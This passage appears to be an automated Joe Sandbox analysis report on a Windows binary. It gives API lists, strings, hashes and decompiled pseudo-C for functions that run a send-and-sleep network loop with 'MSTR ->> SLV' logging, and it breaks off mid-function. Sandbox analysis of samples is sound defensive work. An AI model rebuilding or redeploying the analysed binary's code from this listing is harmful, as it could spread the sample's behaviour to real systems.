GetSystemTime.KERNEL32(?), ref: 00A42C7B

Part of subcall function 00A43360: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00A432B3,000000FF,00000000,00000000,00000000,00000000,00A432B3), ref: 00A43382
Part of subcall function 00A43360: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00A433BC

StrToIntA.SHLWAPI(00000000,00000000), ref: 00A42C8B
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A42CB7
FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000008,00000000,?,00000008), ref: 00A42D04
wnsprintfW.SHLWAPI ref: 00A42D24
wnsprintfW.SHLWAPI ref: 00A42D49
VarDateFromStr.OLEAUT32(?,00000800,80000003,?), ref: 00A42D6A
VariantTimeToSystemTime.OLEAUT32 ref: 00A42D8F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A42DDE
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A42DEC
CompareFileTime.KERNEL32(?,?), ref: 00A42DFA
FileTimeToSystemTime.KERNEL32(?,?,?,?,00000008), ref: 00A42E53
CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00A42E8F
SetWaitableTimer.KERNEL32(006F002D,?,00000000,00000000,00000000,00000000,?,?,000000FF,000000FF), ref: 00A42EDF
CloseHandle.KERNEL32(006F002D), ref: 00A42F08

Strings

%02d:%lS, xrefs: 00A42D13
0Uv, xrefs: 00A42D24, 00A42D49
pAv, xrefs: 00A42D8F
%02d:%lS, xrefs: 00A42D38
M%X - %02d:%02d:%02d, xrefs: 00A42E76

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Time$System$File$ByteCharMultiTimerWaitableWidewnsprintf$CloseCompareCreateDateFromHandleVariant
String ID: %02d:%lS$%02d:%lS$0Uv$M%X - %02d:%02d:%02d$pAv
API String ID: 3806497137-2685693324
Opcode ID: 20037b731a2ecf52b9efcfa902abae2812c411049662d7b7608bd2a46ef8a919
Instruction ID: b318884c5b2a02aab7fdc6d2973f443d117b7dd1780d2741d6bbb10c9a7c7b15
Opcode Fuzzy Hash: 20037b731a2ecf52b9efcfa902abae2812c411049662d7b7608bd2a46ef8a919
Instruction Fuzzy Hash: A0A1E6B9D00208EFDB14DFD4C984BEEBBB5BF88700F608159E505A7245DB759A45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A458E0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 172
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A458E0(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v268;
				intOrPtr _t64;
				char* _t69;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t84;
				void* _t101;
				void* _t102;
				intOrPtr _t107;
				intOrPtr _t112;
				intOrPtr _t118;
				signed int _t124;
				intOrPtr _t139;
				intOrPtr _t145;

				_t64 = _a12;
				_t106 =  *(_t64 + 0x1001b) & 0x000000ff;
				if(( *(_t64 + 0x1001b) & 0x000000ff) != 0) {
					__eflags = _a4 - 0xffffffff;
					if(_a4 != 0xffffffff) {
						_t107 =  *_a8;
						__eflags = ( *(_t107 + 6) & 0x000000ff) - 3;
						if(( *(_t107 + 6) & 0x000000ff) != 3) {
							_t118 =  *_a8;
							__eflags = ( *(_t118 + 6) & 0x000000ff) - 1;
							if(( *(_t118 + 6) & 0x000000ff) == 1) {
								 *((intOrPtr*)( *_a8 + 0xc)) =  *((intOrPtr*)(_a12 + 4));
							}
							_t139 =  *_a8;
							__eflags =  *(_t139 + 6) & 0x000000ff;
							if(( *(_t139 + 6) & 0x000000ff) == 0) {
								 *((intOrPtr*)( *_a8 + 0xc)) =  *((intOrPtr*)(_a12 + 4));
								 *( *_a8 + 8) =  *(_a12 + 8);
								_t124 =  *(_a12 + 8) + 1;
								__eflags = _t124;
								 *(_a12 + 8) = _t124;
							}
						}
						E00A42540( &_v268, 0x100);
						_v12 = E00A414F0(_a8,  &_v268);
						_t69 =  &_v268;
						_t110 = _a4;
						__imp__#19(_a4, _t69, _v12, 0);
						_v8 = _t69;
						__eflags = _v8 - 0xffffffff;
						if(_v8 != 0xffffffff) {
							__eflags = _v8 - 0xffffffff;
							if(_v8 != 0xffffffff) {
								E00A479B0(" MSTR ->> SLV \t",  &_v268, _v12, _a12);
								__eflags = 0;
								return 0;
							}
							_t112 = _a12;
							__eflags =  *(_t112 + 0x10019) & 0x000000ff;
							if(( *(_t112 + 0x10019) & 0x000000ff) == 0) {
								_t76 = E00A439C0(E00A436C0(_t112));
								__imp__#111();
								_t77 = E00A47DB0();
								__imp__#111(_t77, _t76);
								_push(_t77);
								_push(0x6854);
								__eflags = _a12 + 0x1001d;
								E00A43830(__eflags, E00A436C0(_t75), " %s M%X %d (%s)\n", _a12 + 0x1001d);
							}
							 *((char*)(_a12 + 0x10018)) = 1;
							 *((char*)(_a12 + 0x1001b)) = 0;
							return E00A47700(_a4, _a12);
						} else {
							_t83 = E00A439C0(E00A436C0(_t110));
							__imp__#111();
							_t84 = E00A47DB0();
							__imp__#111(_t84, _t83);
							_push(_t84);
							_push(0x6853);
							E00A43830(__eflags, E00A436C0(_t82), " %s M%X %d (%s)\n", _a12 + 0x1001d);
							 *((char*)(_a12 + 0x10018)) = 1;
							 *((char*)(_a12 + 0x1001b)) = 0;
							return E00A47700(_a4, _a12);
						}
					}
					_t145 = _a12;
					__eflags =  *(_t145 + 0x10019) & 0x000000ff;
					if(( *(_t145 + 0x10019) & 0x000000ff) == 0) {
						_t101 = E00A439C0(E00A436C0(_t106));
						__imp__#111();
						_t102 = E00A47DB0();
						__imp__#111(_t102, _t101);
						_push(_t102);
						_push(0x6852);
						__eflags = _a12 + 0x1001d;
						E00A43830(__eflags, E00A436C0(_a12 + 0x1001d), " %s M%X %d (%s)\n", _a12 + 0x1001d);
					}
					 *((char*)(_a12 + 0x10018)) = 1;
					 *((char*)(_a12 + 0x1001b)) = 0;
					return E00A47700(_a4, _a12);
				}
				return 0xffffff9c;
			}

0x00a458e9
0x00a458ec
0x00a458f5
0x00a45901
0x00a45905
0x00a45980
0x00a45986
0x00a45989
0x00a4598e
0x00a45994
0x00a45997
0x00a459a4
0x00a459a4
0x00a459aa
0x00a459b0
0x00a459b2
0x00a459bf
0x00a459cd
0x00a459d6
0x00a459d6
0x00a459dc
0x00a459dc
0x00a459b2
0x00a459eb
0x00a459ff
0x00a45a08
0x00a45a0f
0x00a45a13
0x00a45a19
0x00a45a1c
0x00a45a20
0x00a45a8a
0x00a45a8e
0x00a45b16
0x00a45b1b
0x00000000
0x00a45b1b
0x00a45a90
0x00a45a9a
0x00a45a9c
0x00a45aa5
0x00a45aaa
0x00a45ab1
0x00a45ab7
0x00a45abd
0x00a45abe
0x00a45ac6
0x00a45ad7
0x00a45adc
0x00a45ae2
0x00a45aec
0x00000000
0x00a45a22
0x00a45a29
0x00a45a2e
0x00a45a35
0x00a45a3b
0x00a45a41
0x00a45a42
0x00a45a5c
0x00a45a67
0x00a45a71
0x00000000
0x00a45a80
0x00a45a20
0x00a45907
0x00a45911
0x00a45913
0x00a4591c
0x00a45921
0x00a45928
0x00a4592e
0x00a45934
0x00a45935
0x00a4593d
0x00a4594f
0x00a45954
0x00a4595a
0x00a45964
0x00000000
0x00a45973
0x00000000

APIs

WSAGetLastError.WS2_32 ref: 00A45921
WSAGetLastError.WS2_32(00000000,00000000), ref: 00A4592E

Strings

%s M%X %d (%s), xrefs: 00A45ACC
%s M%X %d (%s), xrefs: 00A45944
%s M%X %d (%s), xrefs: 00A45A51
MSTR ->> SLV , xrefs: 00A45B11

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID: %s M%X %d (%s)$ %s M%X %d (%s)$ %s M%X %d (%s)$ MSTR ->> SLV
API String ID: 1452528299-3921971735
Opcode ID: 0596fd4732d2f302c6076031a4a4e03a5f159d8281da32a1f663bd5e0ae010ca
Instruction ID: a96fbac68759d8bab2582e0b5189c6b1400c065bb4be80cab70932f9b94f58ac
Opcode Fuzzy Hash: 0596fd4732d2f302c6076031a4a4e03a5f159d8281da32a1f663bd5e0ae010ca
Instruction Fuzzy Hash: 2A61C079A00289AFCB04EFA4C885EEF7765BFC8304F148599F9558B382D771DA51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A457D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A457D0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _t20;
				void* _t28;
				void* _t29;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				intOrPtr _t51;

				_t20 = _a12;
				_t41 = _a8;
				__imp__#19(_a4, _a8, _t20, 0, __ecx);
				_v8 = _t20;
				if(_v8 != 0xffffffff) {
					__eflags = _v8 - 0xffffffff;
					if(_v8 != 0xffffffff) {
						E00A479B0(" MSTR ->> SLV \t", _a8, _a12, _a16);
						__eflags = 0;
						return 0;
					}
					_t51 = _a16;
					__eflags =  *(_t51 + 0x10019) & 0x000000ff;
					if(( *(_t51 + 0x10019) & 0x000000ff) == 0) {
						_t28 = E00A439C0(E00A436C0(_t41));
						__imp__#111();
						_t29 = E00A47DB0();
						__imp__#111(_t29, _t28);
						_push(_t29);
						_push(0x6851);
						__eflags = _a16 + 0x1001d;
						E00A43830(__eflags, E00A436C0(_a16 + 0x1001d), " %s M%X %d (%s)\n", _a16 + 0x1001d);
					}
					return E00A47700(_a4, _a16);
				}
				_t32 = _a16;
				_t46 =  *(_t32 + 0x10019) & 0x000000ff;
				if(( *(_t32 + 0x10019) & 0x000000ff) == 0) {
					_t36 = E00A439C0(E00A436C0(_t46));
					__imp__#111();
					_t37 = E00A47DB0();
					__imp__#111(_t37, _t36);
					_push(_t37);
					_push(0x6850);
					E00A43830(_a16 + 0x1001d, E00A436C0(_t35), " %s M%X %d (%s)\n", _a16 + 0x1001d);
				}
				return E00A47700(_a4, _a16);
			}

0x00a457d6
0x00a457da
0x00a457e2
0x00a457e8
0x00a457ef
0x00a45850
0x00a45854
0x00a458c6
0x00a458cb
0x00000000
0x00a458cb
0x00a45856
0x00a45860
0x00a45862
0x00a4586b
0x00a45870
0x00a45877
0x00a4587d
0x00a45883
0x00a45884
0x00a4588c
0x00a4589e
0x00a458a3
0x00000000
0x00a458ae
0x00a457f1
0x00a457f4
0x00a457fd
0x00a45806
0x00a4580b
0x00a45812
0x00a45818
0x00a4581e
0x00a4581f
0x00a45839
0x00a4583e
0x00000000

APIs

send.WS2_32(?,00000080,?,00000000), ref: 00A457E2
WSAGetLastError.WS2_32(?,00A471E2,?,?,00000000,00000000,?,00000080,?), ref: 00A4580B
WSAGetLastError.WS2_32(00000000,00000000,?,00A471E2,?,?,00000000,00000000,?,00000080,?), ref: 00A45818

Part of subcall function 00A436C0: Sleep.KERNELBASE(0000000A,?,00A44FC5, T%d %h,00000000,00006810,00000000,00000000,?,?,?,00000000,00000000), ref: 00A436F5

WSAGetLastError.WS2_32(?,00A471E2,?,?,00000000,00000000,?,00000080,?), ref: 00A45870
WSAGetLastError.WS2_32(00000000,00000000,?,00A471E2,?,?,00000000,00000000,?,00000080,?), ref: 00A4587D

Part of subcall function 00A436C0: InterlockedCompareExchange.KERNEL32(00A4B060,00000001,00000000), ref: 00A436CD

Strings

%s M%X %d (%s), xrefs: 00A4582E
%s M%X %d (%s), xrefs: 00A45893
MSTR ->> SLV , xrefs: 00A458C1

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: ErrorLast$CompareExchangeInterlockedSleepsend
String ID: %s M%X %d (%s)$ %s M%X %d (%s)$ MSTR ->> SLV
API String ID: 3096393760-2920148164
Opcode ID: 8a0ba20d8c99cb6656a27d6eb61f886c7c63f66f32a6194a802d4ee60d5c990d
Instruction ID: c2da2bebe6d43eae1b86f1fd1dd2dfc9dc800599dab9e1a7f358cd560e50a2d6
Opcode Fuzzy Hash: 8a0ba20d8c99cb6656a27d6eb61f886c7c63f66f32a6194a802d4ee60d5c990d
Instruction Fuzzy Hash: 212144BAA00645FBCF04FFB4DE4ADAF7368AFC9311B104908B91597282DA75DA109B71

Uniqueness

Uniqueness Score: -1.00%

Function 00A473C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 231
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00A473C0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				char _v288;
				char _v1312;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t162;
				long _t168;
				intOrPtr _t181;
				intOrPtr _t183;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t207;
				signed int _t221;
				void* _t229;
				void* _t230;

				_v12 = 0;
				_v24 = 0;
				 *(_a4 + 0x10018) = 1;
				while(1 != 0) {
					_t201 = _a4;
					_t233 =  *(_t201 + 0x1001a) & 0x000000ff;
					if(( *(_t201 + 0x1001a) & 0x000000ff) == 0 || (E00A47720(_t233, _a4) & 0x000000ff) != 0) {
						_v24 = _v24 + 1;
						__eflags = _v12;
						if(_v12 != 0) {
							E00A453D0(_v12);
							__imp__#116();
						}
						_v12 = E00A45650(_a4 + 0x1001d,  *((intOrPtr*)(_a4 + 0x10034)));
						 *(_a4 + 0x10018) = 0;
						 *((char*)(_a4 + 0x1001b)) = 1;
						 *(_a4 + 4) = 0;
						 *(_a4 + 8) = 0;
						_v20 = E00A45F10(_v12, _a4);
						_t205 = _a4;
						__eflags = ( *(_t205 + 0x10018) & 0x000000ff) - 1;
						if(( *(_t205 + 0x10018) & 0x000000ff) != 1) {
							__eflags = 1;
							if(1 == 0) {
								L31:
								__eflags = ( *(_a4 + 0x10018) & 0x000000ff) - 1;
								if(__eflags != 0) {
									Sleep(0x3e8);
									_v20 = E00A46220(_v12, _a4);
								}
								continue;
							}
							_t207 = _a4;
							__eflags =  *(_t207 + 0x10018) & 0x000000ff;
							if(( *(_t207 + 0x10018) & 0x000000ff) != 0) {
								goto L31;
							}
							E00A42540( &_v1312, 0x400);
							_v8 = 0;
							_v16 = 0;
							while(1) {
								_t138 = _a4;
								__eflags = _v16 -  *((intOrPtr*)(_t138 + 0x1014c));
								if(_v16 >=  *((intOrPtr*)(_t138 + 0x1014c))) {
									break;
								}
								E00A42540( &_v288, 0x100);
								_v20 = E00A46860(_v12,  &_v288, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)))), 0, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 9) & 0x000000ff);
								__eflags = _v20;
								if(_v20 > 0) {
									__eflags = _v8 + _v20 - 0x400;
									if(_v8 + _v20 >= 0x400) {
										E00A457D0(_v12, _v12,  &_v1312, _v8, _a4);
										_v8 = 0;
										E00A42540( &_v1312, 0x400);
									}
									E00A42190(_t229 + _v8 - 0x51c,  &_v288, _v20);
									_t230 = _t230 + 0xc;
									_v8 = _v8 + _v20;
									_t162 =  *(_a4 + 8) + 1;
									__eflags = _t162;
									 *(_a4 + 8) = _t162;
								}
								_t221 = _v16 + 1;
								__eflags = _t221;
								_v16 = _t221;
							}
							__eflags = _v8;
							if(_v8 > 0) {
								E00A457D0( &_v1312, _v12,  &_v1312, _v8, _a4);
								_v8 = 0;
								E00A42540( &_v1312, 0x400);
							}
							_t181 = _a4;
							__eflags =  *(_t181 + 0x10046) & 0x000000ff;
							if(( *(_t181 + 0x10046) & 0x000000ff) != 0) {
								_t139 = _a4;
								__eflags =  *(_t139 + 0x10045) & 0x000000ff;
								if(( *(_t139 + 0x10045) & 0x000000ff) != 0) {
									_v28 = 0;
								} else {
									_v28 = 1;
								}
								 *((char*)(_a4 + 0x10045)) = _v28;
								_t183 = _a4;
								__eflags =  *(_t183 + 0x10045) & 0x000000ff;
								if(( *(_t183 + 0x10045) & 0x000000ff) == 0) {
									_v32 = "OFF\n\n";
								} else {
									_v32 = "ON\n\n";
								}
								E00A43830(__eflags, E00A436C0(_t183), "\nSwitch value: %s", _v32);
								_t230 = _t230 + 0xc;
							}
							goto L31;
						} else {
							asm("cdq");
							__eflags = _v24 %  *(_a4 + 0xc);
							if(__eflags == 0) {
								_t168 =  *(_a4 + 0x10040) * 0x3e8;
								__eflags = _t168;
								Sleep(_t168);
							}
							continue;
						}
					} else {
						continue;
					}
				}
				__imp__#116();
				_t200 = _a4;
				__eflags =  *(_t200 + 0x10019) & 0x000000ff;
				if(( *(_t200 + 0x10019) & 0x000000ff) == 0) {
					_push("\n\n\nConnection closed ...");
					_push(E00A436C0(1));
					E00A43830(__eflags);
				}
				__eflags = 0;
				return 0;
			}

0x00a473c9
0x00a473d0
0x00a473da
0x00a473e1
0x00a473ee
0x00a473f8
0x00a473fa
0x00a47414
0x00a47417
0x00a4741b
0x00a47421
0x00a47426
0x00a47426
0x00a47445
0x00a4744b
0x00a47455
0x00a4745f
0x00a47469
0x00a4747d
0x00a47480
0x00a4748a
0x00a4748d
0x00a474bb
0x00a474bd
0x00a4769a
0x00a476a4
0x00a476a7
0x00a476b3
0x00a476c6
0x00a476c6
0x00000000
0x00a476a7
0x00a474c3
0x00a474cd
0x00a474cf
0x00000000
0x00000000
0x00a474e1
0x00a474e6
0x00a474ed
0x00a474ff
0x00a474ff
0x00a47505
0x00a4750b
0x00000000
0x00000000
0x00a4751d
0x00a47576
0x00a47579
0x00a4757d
0x00a47585
0x00a4758a
0x00a4759f
0x00a475a4
0x00a475b7
0x00a475b7
0x00a475d2
0x00a475d7
0x00a475e0
0x00a475e9
0x00a475e9
0x00a475ef
0x00a475ef
0x00a474f9
0x00a474f9
0x00a474fc
0x00a474fc
0x00a475f7
0x00a475fb
0x00a47610
0x00a47615
0x00a47628
0x00a47628
0x00a4762d
0x00a47637
0x00a47639
0x00a4763b
0x00a47645
0x00a47647
0x00a47652
0x00a47649
0x00a47649
0x00a47649
0x00a4765f
0x00a47665
0x00a4766f
0x00a47671
0x00a4767c
0x00a47673
0x00a47673
0x00a47673
0x00a47692
0x00a47697
0x00a47697
0x00000000
0x00a4748f
0x00a47495
0x00a47499
0x00a4749b
0x00a474a0
0x00a474a0
0x00a474ab
0x00a474ab
0x00000000
0x00a474b1
0x00a4740c
0x00000000
0x00a4740c
0x00a473fa
0x00a476ce
0x00a476d4
0x00a476de
0x00a476e0
0x00a476e2
0x00a476ec
0x00a476ed
0x00a476f2
0x00a476f5
0x00a476fa

APIs

WSACleanup.WS2_32 ref: 00A47426
Sleep.KERNEL32(?,?,00000000,00000000,-0001001D,?), ref: 00A474AB
Sleep.KERNEL32(000003E8,00000000,00000000,-0001001D,?), ref: 00A476B3
WSACleanup.WS2_32 ref: 00A476CE

Strings

Connection closed ..., xrefs: 00A476E2
Switch value: %s, xrefs: 00A47687

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CleanupSleep
String ID: Connection closed ...$Switch value: %s
API String ID: 1660135218-1043361263
Opcode ID: b3f469f156d586e52413fc7b9cc824e468afd48892ebb464a0735db402e8019a
Instruction ID: 8b9b87f001d240abf989b06f0752b72225eec75f7cc74d576508f9e14912b2da
Opcode Fuzzy Hash: b3f469f156d586e52413fc7b9cc824e468afd48892ebb464a0735db402e8019a
Instruction Fuzzy Hash: 7BA15178A04249ABCB14DF94C990BEEBBB5BF88304F148198F9499B241D775EB81DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A42F30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A42F30(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				void* _v12;
				short _v532;

				_v8 = __ecx;
				E00A42C10(_v8, _a4);
				if(_a8 != 0) {
					wnsprintfW( &_v532, 0x104, L"Global\\%lS", _a8);
					_v12 = OpenEventW(0x100000, 0,  &_v532);
					 *((intOrPtr*)(_v8 + 0x10 +  *(_v8 + 8) * 4)) = _v12;
					if(_v12 != 0) {
						 *((intOrPtr*)(_v8 + 0xc)) =  *((intOrPtr*)(_v8 + 0xc)) + 1;
					}
				}
				return _v8;
			}

0x00a42f39
0x00a42f43
0x00a42f4c
0x00a42f63
0x00a42f80
0x00a42f8f
0x00a42f97
0x00a42fa5
0x00a42fa5
0x00a42f97
0x00a42fae

APIs

Part of subcall function 00A42C10: GetSystemTime.KERNEL32(?), ref: 00A42C7B
Part of subcall function 00A42C10: StrToIntA.SHLWAPI(00000000,00000000), ref: 00A42C8B
Part of subcall function 00A42C10: SystemTimeToFileTime.KERNEL32(?,?), ref: 00A42CB7
Part of subcall function 00A42C10: FileTimeToSystemTime.KERNEL32(?,?,?,00000000,00000008,00000000,?,00000008), ref: 00A42D04
Part of subcall function 00A42C10: wnsprintfW.SHLWAPI ref: 00A42D24
Part of subcall function 00A42C10: VarDateFromStr.OLEAUT32(?,00000800,80000003,?), ref: 00A42D6A
Part of subcall function 00A42C10: VariantTimeToSystemTime.OLEAUT32 ref: 00A42D8F

wnsprintfW.SHLWAPI ref: 00A42F63
OpenEventW.KERNEL32(00100000,00000000,?), ref: 00A42F7A

Strings

Global\%lS, xrefs: 00A42F52
0Uv, xrefs: 00A42F63

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Time$System$Filewnsprintf$DateEventFromOpenVariant
String ID: 0Uv$Global\%lS
API String ID: 662666958-2984149471
Opcode ID: e3a9f3c92ac4ee572ce98f2d3546661d5a7bd0c9872300f656645e4ccf4357d8
Instruction ID: d1300ae178510067db19efacd16b062018e7707fc98152873c629f451a8c6d84
Opcode Fuzzy Hash: e3a9f3c92ac4ee572ce98f2d3546661d5a7bd0c9872300f656645e4ccf4357d8
Instruction Fuzzy Hash: A8012938A00208EFDB14DF98C885BADB7B4FB88300F548598F908A7380D7B1AE95DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A44142 Relevance: 6.3, APIs: 4, Instructions: 314
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A44142() {
				void* _t189;
				void* _t190;
				void* _t193;
				void* _t194;
				void* _t206;
				void* _t208;
				void* _t211;
				void* _t215;
				void* _t219;
				void* _t223;
				intOrPtr _t228;
				void* _t230;
				void* _t231;
				intOrPtr _t238;
				void* _t240;
				void* _t242;
				void* _t320;
				void* _t322;

				if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x18)) != 0) {
					_t193 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x18)));
					_t322 = _t322 + 4;
					if(_t193 > 0) {
						_t8 =  *((intOrPtr*)(_t320 + 8)) + 0x18; // 0x31
						_t194 = E00A43A90(_t193,  *((intOrPtr*)(_t320 + 8)),  *_t8, 0xa49c48);
						_t322 = _t322 + 8;
						if(_t194 == 0) {
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)) == 0) {
								L13:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6828;
							} else {
								_t279 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c));
								_t240 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)));
								_t322 = _t322 + 4;
								if(_t240 <= 0) {
									goto L13;
								} else {
									_t242 = E00A43A90( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)), _t279,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x1c)), 0xa49c4c);
									_t322 = _t322 + 8;
									if(_t242 != 0) {
										 *((intOrPtr*)(_t320 - 0x18)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x18)) = 1;
									}
									 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x1001a)) =  *((intOrPtr*)(_t320 - 0x18));
								}
							}
							if( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)) == 0) {
								 *((intOrPtr*)(_t320 - 4)) = 0xffffffff;
							} else {
								_t238 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)));
								_t322 = _t322 + 4;
								 *((intOrPtr*)(_t320 - 4)) = _t238;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)) == 0 ||  *((intOrPtr*)(_t320 - 4)) <= 0 ||  *((intOrPtr*)(_t320 - 4)) >= 0xff) {
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x6829;
							} else {
								E00A41A10( *((intOrPtr*)(_t320 + 0xc)) + 0x10047,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x20)));
								_t322 = _t322 + 8;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)) == 0) {
								L30:
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
							} else {
								_t230 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)));
								_t322 = _t322 + 4;
								if(_t230 <= 0) {
									goto L30;
								} else {
									_t231 = E00A43A90(_t230,  *((intOrPtr*)(_t320 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x24)), 0xa49c50);
									_t322 = _t322 + 8;
									if(_t231 != 0) {
										 *((intOrPtr*)(_t320 - 0x1c)) = 0;
									} else {
										 *((intOrPtr*)(_t320 - 0x1c)) = 1;
									}
									 *((char*)( *((intOrPtr*)(_t320 + 0xc)) + 0x10154)) =  *((intOrPtr*)(_t320 - 0x1c));
								}
							}
							if( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)) == 0) {
								 *((intOrPtr*)(_t320 - 4)) = 0xffffffff;
							} else {
								_t228 = E00A430B0( *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)));
								_t322 = _t322 + 4;
								 *((intOrPtr*)(_t320 - 4)) = _t228;
							}
							if(( *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) & 0x000000ff) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t320 + 8)) + 0x28)) == 0 ||  *((intOrPtr*)(_t320 - 4)) <= 0 ||  *((intOrPtr*)(_t320 - 4)) >= 0x400) {
								 *( *((intOrPtr*)(_t320 + 0xc)) + 0x10018) = 1;
								 *((intOrPtr*)(_t320 - 8)) = 0x682a;
							} else {
